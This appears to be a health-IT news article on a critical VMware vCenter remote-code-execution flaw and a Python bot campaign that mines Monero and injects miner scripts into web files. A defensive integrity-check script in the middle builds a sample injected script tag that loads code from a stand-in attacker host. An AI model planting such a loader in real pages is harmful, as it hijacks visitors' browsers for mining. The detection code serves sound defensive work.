
VMware Flaw: Patch Now as Hackers, Malware Exploit Security Gap

A widespread bot campaign has been observed delivering worming malware via a recently disclosed VMware RCE flaw, as CISA warns attackers are seeking to exploit the security gap.

A critical RCE flaw in VMware platforms calls for prompt patching as new bot-based malware targets unpatched systems

By Jessica Davis

Since its disclosure by VMware just two weeks ago, researchers have observed attackers hunting for unpatched systems and a widespread bot campaign that delivers worming malware, according to a Cisco Talos report and a Cybersecurity and Infrastructure Security Agency alert.

CISA warns of an increased likelihood that attackers are working to exploit the critical remote code execution (RCE) vulnerability in VMware vCenter Server and Cloud Foundation platforms. Many organizations have failed to patch the flaw with the software update provided on May 25.

Ranked at a 9.8 out of 10 for severity, the flaw is found in vCenter Server 6.5, 6.7, and 7.0 -- widely used across the globe. The vulnerability is caused by a lack of input validation within the Virtual SAN Health Check plugin, which is enabled by default in vCenter Server.

A successful exploit could enable a remote attacker with access to port 443 to take control of the impacted system and execute commands with unrestricted privileges on the victim’s network.

The concern is that the vCenter server is used to administer VMware’s vSphere and ESXi host products, with VMware warning that the flaw can be exploited “by anyone who can reach vCenter Server over the network to gain access, regardless of whether you use vSAN or not.”


At the time of the disclosure, VMware leaders urged entities to immediately patch the security gap in light of the heightened threat landscape.

“In this era of ransomware it is safest to assume that an attacker is already inside the network somewhere, on a desktop and perhaps even in control of a user account, which is why we strongly recommend declaring an emergency change and patching as soon as possible,” VMware Technical Architect Bob Plankers explained at the time.

“These updates fix a critical security vulnerability, and it needs to be considered at once. Organizations that practice change management using the ITIL definitions of change types would consider this an ‘emergency change,’” he added.

As CISA has been informed of attackers seeking to exploit unpatched systems, the alert urges entities to review VMware’s previously published mitigation measures and workarounds, or to have administrators apply the software update immediately.

Patching is critical, as Cisco Talos researchers have observed a malware campaign using a Necro Python bot and new functionalities to exploit a range of vulnerabilities in various platforms, including the recently disclosed RCE flaws in VMware vSphere platforms.


Check Point discovered the FreakOut bot in January 2020, which uses Internet Relay Chat (IRC) for communication with the threat actor’s C2 server. The bot contains functionality to spread by exploiting vulnerabilities in applications and operating systems.

Although the threat has been leveraged since 2015, Cisco Talos has seen a drastic increase in bot activity since the beginning of the year.

The threat actors have also been observed leveraging brute-force and password-spraying attacks over the SSH protocol. But the bot’s primary attack method is DDoS; it also scans for known vulnerabilities and can exfiltrate network traffic through a SOCKS proxy.

The bot also installs cryptocurrency mining software to mine Monero, and injects JavaScript code that downloads and launches Monero miner code.

“The bot hides its presence on the system by installing a user-mode rootkit designed to hide the malicious process and malicious registry entries created to ensure that the bot runs every time a user logs into the infected system,” researchers explained.


“The bot also injects the code to download and execute a JavaScript-based miner from an attacker-controlled server into HTML and PHP files on infected systems,” they added. “If the user opens the infected application, a JavaScript-based Monero miner will run within their browser's process space.”
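The injection into HTML and PHP files described above is the kind of change a web-root integrity check catches. The following Python script is an added example written for this article, not Cisco Talos or Check Point code: it baselines the SHA-256 of every HTML/PHP file, then on a later run reports files that are new or modified and any `<script src>` that points at a host outside an allowlist. The sample files, the `cdn.example.com` allowlisted host and the `miner.attacker.invalid` host are all constructed for the demo.

```python
import hashlib
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Matches <script ... src="..."> (quotes optional) and captures the src value.
SCRIPT_SRC_RE = re.compile(
    r"""<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
WEB_SUFFIXES = {".html", ".htm", ".php"}


def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def build_baseline(web_root: Path) -> dict:
    """Map each HTML/PHP file (path relative to web_root) to its SHA-256 at a known-good time."""
    return {
        str(p.relative_to(web_root)): sha256_of(p)
        for p in sorted(web_root.rglob("*"))
        if p.is_file() and p.suffix.lower() in WEB_SUFFIXES
    }


def external_script_hosts(text: str) -> list:
    """Return hostnames of all script tags that load from another origin."""
    hosts = []
    for src in SCRIPT_SRC_RE.findall(text):
        if src.startswith("//"):          # protocol-relative URL, as miners often use
            src = "https:" + src
        host = urlparse(src).hostname
        if host:                           # relative paths such as /js/app.js have no host
            hosts.append(host.lower())
    return hosts


def audit(web_root: Path, baseline: dict, allowed_hosts: set) -> list:
    """Report new/modified web files and any script host not on the allowlist."""
    findings = []
    for p in sorted(web_root.rglob("*")):
        if not (p.is_file() and p.suffix.lower() in WEB_SUFFIXES):
            continue
        rel = str(p.relative_to(web_root))
        digest = sha256_of(p)
        if rel not in baseline:
            status = "new"
        elif baseline[rel] != digest:
            status = "modified"
        else:
            status = "unchanged"
        unexpected = sorted({h for h in external_script_hosts(p.read_text(errors="replace"))
                             if h not in allowed_hosts})
        if status != "unchanged" or unexpected:
            findings.append({"file": rel, "status": status, "unexpected_hosts": unexpected})
    return findings


def demo() -> list:
    """Build a constructed web root, baseline it, simulate an injection, and audit."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.html").write_text(
            '<html><head><script src="https://cdn.example.com/app.js"></script></head>'
            '<body>hello</body></html>')
        (root / "about.php").write_text("<?php echo 'about'; ?><p>About</p>")
        (root / "readme.txt").write_text("not a web page, ignored by the audit")
        baseline = build_baseline(root)

        # Constructed stand-in for the loader the bot appends to existing pages.
        injected = '<script src="//miner.attacker.invalid/m.js"></script>'
        (root / "about.php").write_text((root / "about.php").read_text() + injected)
        (root / "new.html").write_text("<html>" + injected + "</html>")

        return audit(root, baseline, allowed_hosts={"cdn.example.com"})


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

In practice the baseline would be stored outside the web root (it is as useful to the attacker as to you if it sits beside the files it protects), and the allowlist would hold only the CDN and analytics hosts the site is known to use, so that any new third-party script host is surfaced for review.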

The concern is that the bot is targeting a range of unpatched vulnerabilities, which increases the risk of spreading and infecting systems. As the threat is self-replicating and primarily exploits server-side software, the potential impact is much greater.

The healthcare sector has seen a large increase in bad bot traffic this year, given the rise in COVID-19 websites, applications, and tracking tools. Researchers have previously explained that bot use not only enables system exploits but can also cause a host of other risks for the sector.

“The use cases for bots in healthcare extend beyond nefarious purposes,” Edward Roberts, application security strategist at Imperva, previously told HealthITSecurity.com. “Health insurance providers have used bots for competitive intelligence by scraping their competitors’ policies online, and medical listing services often use scraping bots to keep their databases of doctors and specialists up-to-date.”